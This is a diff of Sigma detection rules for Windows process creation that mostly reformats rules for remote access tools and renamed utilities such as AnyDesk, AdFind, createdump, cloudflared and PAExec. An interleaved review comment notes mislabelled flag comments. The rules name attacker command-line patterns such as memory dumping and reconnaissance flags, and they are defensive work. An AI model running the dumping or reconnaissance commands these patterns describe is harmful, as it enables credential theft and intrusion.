+++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml @@ -1,12 +1,11 @@ title: Remote Access Tool - AnyDesk Silent Installation id: 114e7f1c-f137-48c8-8f54-3088c24ce4b9 status: test -description: Detects AnyDesk Remote Desktop silent installation. Which can be used - by attackers to gain remote access. +description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access. references: - https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20 - https://support.anydesk.com/Automatic_Deployment -author: "J\xE1n Tren\u010Dansk\xFD" +author: Ján Trenčanský date: 2021/08/06 modified: 2023/03/05 tags: @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - --install - --start-with-win - --silent diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml index 38bde01c0..71d23f064 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml 
@@ -1,21 +1,13 @@ title: Remote Access Tool - Anydesk Execution From Suspicious Folder id: 065b00ca-5d5c-4557-ac95-64a6d0b64d86 related: - - id: b52e84a3-029e-4529-b09b-71d19dd27e94 - type: similar + - id: b52e84a3-029e-4529-b09b-71d19dd27e94 + type: similar status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows author: Florian Roth (Nextron Systems) 
@@ -32,12 +24,12 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \AnyDesk.exe - - Description: AnyDesk - - Product: AnyDesk - - Company: AnyDesk Software GmbH + - NewProcessName|endswith: \AnyDesk.exe + - Description: AnyDesk + - Product: AnyDesk + - Company: AnyDesk Software GmbH filter: - NewProcessName|contains: + NewProcessName|contains: - \AppData\ - Program Files (x86)\AnyDesk - Program Files\AnyDesk diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml index 9b759b4b7..85d32a0c6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - NetSupport Execution From Unusual Location id: 37e8d358-6408-4853-82f4-98333fca7014 status: test -description: Detects execution of client32.exe (NetSupport RAT) from an unusual location - (outside of 'C:\Program Files') +description: Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files') references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) 
@@ -18,13 +17,13 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \client32.exe - - Product|contains: NetSupport Remote Control - - OriginalFileName|contains: client32.exe - - Imphash: a9d50692e95b79723f3e76fcf70d023e - - Hashes|contains: IMPHASH=a9d50692e95b79723f3e76fcf70d023e + - NewProcessName|endswith: \client32.exe + - Product|contains: NetSupport Remote Control + - OriginalFileName|contains: client32.exe + - Imphash: a9d50692e95b79723f3e76fcf70d023e + - Hashes|contains: IMPHASH=a9d50692e95b79723f3e76fcf70d023e filter: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Program Files\ - C:\Program Files (x86)\ condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml index 92fdd5ce3..b2a0e9c3c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - RURAT Execution From Unusual Location id: e01fa958-6893-41d4-ae03-182477c5e77d status: test -description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location - (outside of 'C:\Program Files') +description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) 
@@ -18,12 +17,12 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - \rutserv.exe - - \rfusclient.exe - - Product: Remote Utilities + - NewProcessName|endswith: + - \rutserv.exe + - \rfusclient.exe + - Product: Remote Utilities filter: - NewProcessName|startswith: + NewProcessName|startswith: - C:\Program Files\Remote Utilities - C:\Program Files (x86)\Remote Utilities condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml index 75b560e14..ada6032f5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - ScreenConnect Suspicious Execution id: 75bfe6e6-cd8e-429e-91d3-03921e1d7962 status: test -description: Detects ScreenConnect program starts that establish a remote access to - that system (not meeting, not remote support) +description: Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support) references: - https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies author: Florian Roth (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - e=Access& - y=Guest& - '&p=' diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml index bffff1ce9..4172417d0 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - ScreenConnect Backstage Mode Anomaly id: 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5 status: test -description: Detects suspicious sub processes started by the ScreenConnect client - service, which indicates the use of the so-called Backstage mode +description: Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode references: - https://www.mandiant.com/resources/telegram-malware-iranian-espionage - https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode @@ -21,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: ScreenConnect.ClientService.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml index 89b8fc337..0bcf7800e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml 
@@ -19,13 +19,14 @@ detection: selection_parent: ParentProcessName|endswith: \ScreenConnect.ClientService.exe selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: \TEMP\ScreenConnect\ + # Example: + # CommandLine: "cmd.exe" /c "C:\Windows\TEMP\ScreenConnect\23.6.8.8644\3c41d689-bbf5-4216-b2f4-ba8fd6192c25run.cmd" + CommandLine|contains: \TEMP\ScreenConnect\ condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily - used. + - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_remote_time_discovery.yml b/sigma/builtin/process_creation/proc_creation_win_remote_time_discovery.yml index bba6caff4..e2f08c4c6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_remote_time_discovery.yml +++ b/sigma/builtin/process_creation/proc_creation_win_remote_time_discovery.yml @@ -1,9 +1,7 @@ title: Discovery of a System Time id: b243b280-65fe-48df-ba07-6ddea7646427 status: test -description: Identifies use of various commands to query a systems time. This technique - may be used before executing a scheduled task or to discover the time zone of - a target system. +description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. references: - https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md 
@@ -21,16 +19,15 @@ detection: EventID: 4688 Channel: Security selection_time: - CommandLine|contains: time - NewProcessName|endswith: + CommandLine|contains: time + NewProcessName|endswith: - \net.exe - \net1.exe selection_w32tm: - CommandLine|contains: tz - NewProcessName|endswith: \w32tm.exe + CommandLine|contains: tz + NewProcessName|endswith: \w32tm.exe condition: process_creation and (1 of selection_*) falsepositives: - - Legitimate use of the system utilities to discover system time for legitimate - reason + - Legitimate use of the system utilities to discover system time for legitimate reason level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_adfind.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_adfind.yml index bee04672a..110e1fa5d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_adfind.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_adfind.yml @@ -1,9 +1,7 @@ title: Renamed AdFind Execution id: df55196f-f105-44d3-a675-e9dfb6cc2f2b status: test -description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen - across majority of breaches. It is used to domain trust discovery to plan out - subsequent steps in the attack chain. +description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain. references: - https://www.joeware.net/freetools/tools/adfind/ - https://thedfirreport.com/2020/05/08/adfind-recon/ @@ -28,7 +26,7 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - domainlist - trustdmp - dcmodes 
@@ -49,16 +47,16 @@ detection: - computers_active - computers_pwdnotreqd selection_2: - - Imphash: - - bca5675746d13a1f246e2da3c2217492 - - 53e117a96057eaf19c41380d0e87f1c2 - - Hashes|contains: - - IMPHASH=BCA5675746D13A1F246E2DA3C2217492 - - IMPHASH=53E117A96057EAF19C41380D0E87F1C2 + - Imphash: + - bca5675746d13a1f246e2da3c2217492 + - 53e117a96057eaf19c41380d0e87f1c2 + - Hashes|contains: + - IMPHASH=BCA5675746D13A1F246E2DA3C2217492 + - IMPHASH=53E117A96057EAF19C41380D0E87F1C2 selection_3: OriginalFileName: AdFind.exe filter: - NewProcessName|endswith: \AdFind.exe + NewProcessName|endswith: \AdFind.exe condition: process_creation and (1 of selection* and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_autoit.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_autoit.yml index 2cb36da85..4ed9b9893 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_autoit.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_autoit.yml 
@@ -1,15 +1,10 @@ title: Renamed AutoIt Execution id: f4264e47-f522-4c38-a420-04525d5b880f status: experimental -description: 'Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. - - AutoIt is a scripting language and automation tool for Windows systems. While - primarily used for legitimate automation tasks, it can be misused in cyber attacks. - - Attackers can leverage AutoIt to create and distribute malware, including keyloggers, - spyware, and botnets. A renamed AutoIt executable is particularly suspicious. - - ' +description: | + Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. + AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. + Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious. references: - https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w - https://www.autoitscript.com/site/ 
@@ -27,25 +22,25 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - ' /AutoIt3ExecuteScript' - ' /ErrorStdOut' selection_2: - - Imphash: - - fdc554b3a8683918d731685855683ddf - - cd30a61b60b3d60cecdb034c8c83c290 - - f8a00c72f2d667d2edbb234d0c0ae000 - - Hashes|contains: - - IMPHASH=FDC554B3A8683918D731685855683DDF - - IMPHASH=CD30A61B60B3D60CECDB034C8C83C290 - - IMPHASH=F8A00C72F2D667D2EDBB234D0C0AE000 + - Imphash: + - fdc554b3a8683918d731685855683ddf # AutoIt v2 - doesn't cover all binaries + - cd30a61b60b3d60cecdb034c8c83c290 # AutoIt v2 - doesn't cover all binaries + - f8a00c72f2d667d2edbb234d0c0ae000 # AutoIt v3 - doesn't cover all binaries + - Hashes|contains: + - IMPHASH=FDC554B3A8683918D731685855683DDF # AutoIt v2 - doesn't cover all binaries + - IMPHASH=CD30A61B60B3D60CECDB034C8C83C290 # AutoIt v2 - doesn't cover all binaries + - IMPHASH=F8A00C72F2D667D2EDBB234D0C0AE000 # AutoIt v3 - doesn't cover all binaries selection_3: OriginalFileName: - AutoIt3.exe - AutoIt2.exe - AutoIt.exe filter_main_legit_name: - NewProcessName|endswith: + NewProcessName|endswith: - \AutoIt.exe - \AutoIt2.exe - \AutoIt3_x64.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_browsercore.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_browsercore.yml index c2bb2bfe9..f823351c3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_browsercore.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_browsercore.yml @@ -1,8 +1,7 @@ title: Renamed BrowserCore.EXE Execution id: 8a4519e8-e64a-40b6-ae85-ba8ad2177559 status: test -description: Detects process creation with a renamed BrowserCore.exe (used to extract - Azure tokens) +description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) references: - https://twitter.com/mariuszbit/status/1531631015139102720 author: Max Altgelt (Nextron Systems) 
@@ -21,7 +20,7 @@ detection: selection: OriginalFileName: BrowserCore.exe filter_realbrowsercore: - NewProcessName|endswith: \BrowserCore.exe + NewProcessName|endswith: \BrowserCore.exe condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_cloudflared.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_cloudflared.yml index 843d981dc..787a91db1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_cloudflared.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_cloudflared.yml @@ -21,23 +21,23 @@ detection: EventID: 4688 Channel: Security selection_cleanup: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - 'cleanup ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-connector-id ' selection_tunnel: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - ' run ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-credentials-contents ' - '-credentials-file ' - '-token ' selection_accountless: - CommandLine|contains|all: + CommandLine|contains|all: - -url - tunnel selection_hashes: @@ -81,7 +81,7 @@ detection: - SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77 - SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078 filter_main_known_names: - NewProcessName|endswith: + NewProcessName|endswith: - \cloudflared.exe - \cloudflared-windows-386.exe - \cloudflared-windows-amd64.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_createdump.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_createdump.yml index 8e2eefd02..ce40101a5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_createdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_createdump.yml 
@@ -1,11 +1,10 @@ title: Renamed CreateDump Utility Execution id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e related: - - id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 - type: similar + - id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 + type: similar status: test -description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to - dump process memory +description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - https://twitter.com/bopin2020/status/1366400799199272960 @@ -26,16 +25,16 @@ detection: selection_pe: OriginalFileName: FX_VER_INTERNALNAME_STR selection_cli: - - CommandLine|contains|all: - - ' -u ' - - ' -f ' - - .dmp - - CommandLine|contains|all: - - ' --full ' - - ' --name ' - - .dmp + - CommandLine|contains|all: + - ' -u ' # Short version of '--full' + - ' -f ' # Short version of '--name' + - .dmp + - CommandLine|contains|all: + - ' --full ' # Short version of '--full' + - ' --name ' # Short version of '--name' + - .dmp filter: - NewProcessName|endswith: \createdump.exe + NewProcessName|endswith: \createdump.exe condition: process_creation and (1 of selection_* and not filter) falsepositives: - Command lines that use the same flags diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_curl.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_curl.yml index 84c50c1ba..e3215dc53 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_curl.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_curl.yml 
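Review bot: The inline comments added to the second `CommandLine|contains|all` list in `selection_cli` are mislabelled: `' --full ' # Short version of '--full'` and `' --name ' # Short version of '--name'` describe the long-form flags as short versions of themselves. The comments on the first list are the accurate ones (`-u` is the short form of `--full`, `-f` of `--name`), so the second list should read `' --full ' # Long version of '-u'` and `' --name ' # Long version of '-f'`. Left as is, a reader comparing the two lists gets contradictory information about which spelling is the abbreviation, which matters when tuning the rule or writing a matching filter.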
@@ -1,8 +1,7 @@ title: Renamed CURL.EXE Execution id: 7530cd3d-7671-43e3-b209-976966f6ea48 status: experimental -description: Detects the execution of a renamed "CURL.exe" binary based on the PE - metadata fields +description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields references: - https://twitter.com/Kostastsale/status/1700965142828290260 author: X__Junior (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: curl.exe - - Description: The curl executable + - OriginalFileName: curl.exe + - Description: The curl executable filter_main_img: - NewProcessName|contains: \curl + NewProcessName|contains: \curl condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_gpg4win.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_gpg4win.yml index 305df9dbc..60c365e96 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_gpg4win.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_gpg4win.yml @@ -1,8 +1,7 @@ title: Renamed Gpg.EXE Execution id: ec0722a3-eb5c-4a56-8ab2-bf6f20708592 status: experimental -description: Detects the execution of a renamed "gpg.exe". Often used by ransomware - and loaders to decrypt/encrypt data. +description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. references: - https://securelist.com/locked-out/68960/ author: Nasreddine Bencherchali (Nextron Systems), frack113 @@ -20,7 +19,7 @@ detection: selection: OriginalFileName: gpg.exe filter_main_img: - NewProcessName|endswith: + NewProcessName|endswith: - \gpg.exe - \gpg2.exe condition: process_creation and (selection and not 1 of filter_main_*) 
diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_netsupport_rat.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_netsupport_rat.yml index f6c0d0efd..fc30766e4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_netsupport_rat.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_netsupport_rat.yml @@ -1,8 +1,7 @@ title: Renamed NetSupport RAT Execution id: 0afbd410-de03-4078-8491-f132303cb67d status: test -description: Detects the execution of a renamed "client32.exe" (NetSupport RAT) via - Imphash, Product and OriginalFileName strings +description: Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,12 +17,12 @@ detection: EventID: 4688 Channel: Security selection: - - Product|contains: NetSupport Remote Control - - OriginalFileName|contains: client32.exe - - Imphash: a9d50692e95b79723f3e76fcf70d023e - - Hashes|contains: IMPHASH=A9D50692E95B79723F3E76FCF70D023E + - Product|contains: NetSupport Remote Control + - OriginalFileName|contains: client32.exe + - Imphash: a9d50692e95b79723f3e76fcf70d023e + - Hashes|contains: IMPHASH=A9D50692E95B79723F3E76FCF70D023E filter: - NewProcessName|endswith: \client32.exe + NewProcessName|endswith: \client32.exe condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_office_processes.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_office_processes.yml index 4695ee0d8..48ad9759b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_office_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_office_processes.yml 
@@ -17,26 +17,26 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: - - Excel.exe - - MSACCESS.EXE - - MSPUB.EXE - - OneNote.exe - - OneNoteM.exe - - OUTLOOK.EXE - - POWERPNT.EXE - - WinWord.exe - - Description: - - Microsoft Access - - Microsoft Excel - - Microsoft OneNote - - Microsoft Outlook - - Microsoft PowerPoint - - Microsoft Publisher - - Microsoft Word - - Sent to OneNote Tool + - OriginalFileName: + - Excel.exe + - MSACCESS.EXE + - MSPUB.EXE + - OneNote.exe + - OneNoteM.exe + - OUTLOOK.EXE + - POWERPNT.EXE + - WinWord.exe + - Description: + - Microsoft Access + - Microsoft Excel + - Microsoft OneNote + - Microsoft Outlook + - Microsoft PowerPoint + - Microsoft Publisher + - Microsoft Word + - Sent to OneNote Tool filter_main_legit_names: - NewProcessName|endswith: + NewProcessName|endswith: - \EXCEL.exe - \excelcnv.exe - \MSACCESS.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_paexec.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_paexec.yml index af7b628a6..c91950d3e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_paexec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_paexec.yml @@ -1,8 +1,8 @@ title: Renamed PAExec Execution id: c4e49831-1496-40cf-8ce1-b53f942b02f9 related: - - id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b - type: obsoletes + - id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b + type: obsoletes status: test description: Detects execution of renamed version of PAExec. Often used by attackers references: 
@@ -22,28 +22,26 @@ detection: EventID: 4688 Channel: Security selection: - - Description: PAExec Application - - OriginalFileName: PAExec.exe - - Product|contains: PAExec - - Imphash: - - 11D40A7B7876288F919AB819CC2D9802 - - 6444f8a34e99b8f7d9647de66aabe516 - - dfd6aa3f7b2b1035b76b718f1ddc689f - - 1a6cca4d5460b1710a12dea39e4a592c - - Hashes|contains: - - IMPHASH=11D40A7B7876288F919AB819CC2D9802 - - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 - - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f - - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c + - Description: PAExec Application + - OriginalFileName: PAExec.exe + - Product|contains: PAExec + - Imphash: + - 11D40A7B7876288F919AB819CC2D9802 + - 6444f8a34e99b8f7d9647de66aabe516 + - dfd6aa3f7b2b1035b76b718f1ddc689f + - 1a6cca4d5460b1710a12dea39e4a592c + - Hashes|contains: + - IMPHASH=11D40A7B7876288F919AB819CC2D9802 + - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 + - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f + - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c filter: - - NewProcessName|endswith: \paexec.exe - - NewProcessName|startswith: C:\Windows\PAExec- + - NewProcessName|endswith: \paexec.exe + - NewProcessName|startswith: C:\Windows\PAExec- condition: process_creation and (selection and not filter) falsepositives: - Weird admins that rename their tools - - Software companies that bundle PAExec with their software and rename it, so - that it is less embarrassing - - When executed with the "-s" flag. PAExec will copy itself to the "C:\Windows\" - directory with a different name. Usually like this "PAExec-[XXXXX]-[ComputerName]" + - Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing + - When executed with the "-s" flag. PAExec will copy itself to the "C:\Windows\" directory with a different name. Usually like this "PAExec-[XXXXX]-[ComputerName]" level: high ruletype: Sigma 
diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_pingcastle.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_pingcastle.yml index 0157f115c..6c0d0b8c0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_pingcastle.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_pingcastle.yml @@ -1,8 +1,7 @@ title: Renamed PingCastle Binary Execution id: 2433a154-bb3d-42e4-86c3-a26bdac91c45 status: experimental -description: Detects the execution of a renamed "PingCastle" binary based on the PE - metadata fields. +description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. references: - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ - https://www.pingcastle.com/documentation/scanner/ 
@@ -21,36 +20,36 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: - - PingCastleReporting.exe - - PingCastleCloud.exe - - PingCastle.exe - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - - --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' + - OriginalFileName: + - PingCastleReporting.exe + - PingCastleCloud.exe + - PingCastle.exe + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - --healthcheck + - '--server ' filter_main_img: - NewProcessName|endswith: + NewProcessName|endswith: - \PingCastleReporting.exe - \PingCastleCloud.exe - \PingCastle.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_pressanykey.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_pressanykey.yml index 15038549b..2ad7e4668 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_pressanykey.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_pressanykey.yml 
@@ -1,11 +1,10 @@ title: Visual Studio NodejsTools PressAnyKey Renamed Execution id: 65c3ca2c-525f-4ced-968e-246a713d164f related: - - id: a20391f8-76fb-437b-abc0-dba2df1952c6 - type: similar + - id: a20391f8-76fb-437b-abc0-dba2df1952c6 + type: similar status: test -description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", - which can be abused as a LOLBIN to execute arbitrary binaries +description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries references: - https://twitter.com/mrd0x/status/1463526834918854661 - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 @@ -25,7 +24,7 @@ detection: selection: OriginalFileName: Microsoft.NodejsTools.PressAnyKey.exe filter_main_legit_name: - NewProcessName|endswith: \Microsoft.NodejsTools.PressAnyKey.exe + NewProcessName|endswith: \Microsoft.NodejsTools.PressAnyKey.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml index 5953ab488..142b81711 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml 
